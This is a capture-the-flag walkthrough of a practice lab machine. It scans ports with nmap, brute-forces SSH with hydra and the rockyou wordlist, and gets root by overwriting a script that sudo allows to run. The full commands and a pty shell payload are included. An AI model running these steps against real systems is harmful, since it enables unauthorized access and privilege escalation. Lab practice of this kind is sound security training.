Skip to main content

Library

1. Reconnaissance and Enumeration

1.1. Initial Port Scan

export TARGET_IP=10.10.37.96  # Set the target IP as an environment variable for convenience.
nmap -p- --min-rate 5000 $TARGET_IP

Results:

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

1.2. Web Enumeration

We further investigate the web server running on port 80.

  • Direct Access: Browsing to http://10.10.37.96/ reveals a blog post authored by "meliodas". This is a potential username for later use.

  • robots.txt Analysis: Examining http://10.10.37.96/robots.txt reveals the following:

    User-agent: rockyou

    Interpretation: This is a strong hint. It implies that we should use the rockyou.txt wordlist, likely against the SSH service, given the potential username "meliodas".

2. Exploitation: SSH Brute-Force

hydra -V -l "meliodas" -P /usr/share/wordlists/rockyou.txt ssh://$TARGET_IP -f

Results:

[22][ssh] host: 10.10.37.96   login: meliodas   password: iloveyou1

Success: hydra successfully identifies the password "iloveyou1" for the user "meliodas".

3. Privilege Escalation

3.1. Initial Shell and Enumeration

We log in to the target machine using the discovered credentials:

ssh meliodas@10.10.37.96  # Password: iloveyou1

Once logged in, we perform basic system enumeration:

id

Output:

uid=1000(meliodas) gid=1000(meliodas) groups=1000(meliodas),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare)
sudo -l

Output:

(ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py
  • sudo -l: Lists the commands that "meliodas" can run with sudo (superuser privileges). Crucially, the output shows that "meliodas" can execute /usr/bin/python* /home/meliodas/bak.py as root without a password (NOPASSWD). This is a significant misconfiguration and our path to privilege escalation.

3.2. Exploiting the Python Script

We examine the bak.py script:

cat /home/meliodas/bak.py
#!/usr/bin/env python
import os
import zipfile

def zipdir(path, ziph):
    for root, dirs, files in os.walk(path):
        for file in files:
            ziph.write(os.path.join(root, file))

if __name__ == '__main__':
    zipf = zipfile.ZipFile('/var/backups/website.zip', 'w', zipfile.ZIP_DEFLATED)
    zipdir('/var/www/html', zipf)
    zipf.close()

3.3. Gaining Root Access

We replace the bak.py script with a simple command to spawn a root shell:

rm /home/meliodas/bak.py
echo 'import pty; pty.spawn("/bin/sh")' > /home/meliodas/bak.py

Explanation of Payload:

  • import pty: Imports the pty module, which is used to create pseudo-terminals. This is a more reliable way to get a shell than simply using os.system.
  • pty.spawn("/bin/sh"): Spawns a new shell (/bin/sh) within a pseudo-terminal.

Now, we execute the modified script using sudo:

sudo /usr/bin/python /home/meliodas/bak.py
id

Output

uid=0(root) gid=0(root) groups=0(root)

Success! We have obtained a root shell. The id command confirms that we are now running as the root user (UID 0).